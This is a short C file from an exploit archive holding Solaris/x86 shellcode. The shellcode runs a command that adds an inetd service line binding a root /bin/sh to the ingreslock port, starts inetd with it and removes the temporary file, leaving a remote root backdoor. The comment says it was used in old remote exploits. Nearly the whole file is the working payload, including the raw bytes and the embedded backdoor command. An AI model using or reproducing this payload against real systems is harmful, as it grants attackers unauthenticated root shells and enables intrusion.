23 lines
No EOL
831 B
C
23 lines
No EOL
831 B
C
/*
|
|
* Solaris/x86
|
|
*
|
|
* Just execve()'s the following:
|
|
* "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
|
|
* "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";
|
|
*
|
|
* for a trivial remote bd. Used in a few old Solaris/x86 remote exploits.
|
|
*/
|
|
|
|
char c0de[] =
|
|
"\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4"
|
|
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10"
|
|
"\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6"
|
|
"\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02"
|
|
"\x03\x03\x03\x03\x04\x04\x04\x04"
|
|
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20"
|
|
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
|
|
"/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";
|
|
|
|
/* EOF */
|
|
|
|
# milw0rm.com [2004-09-26] |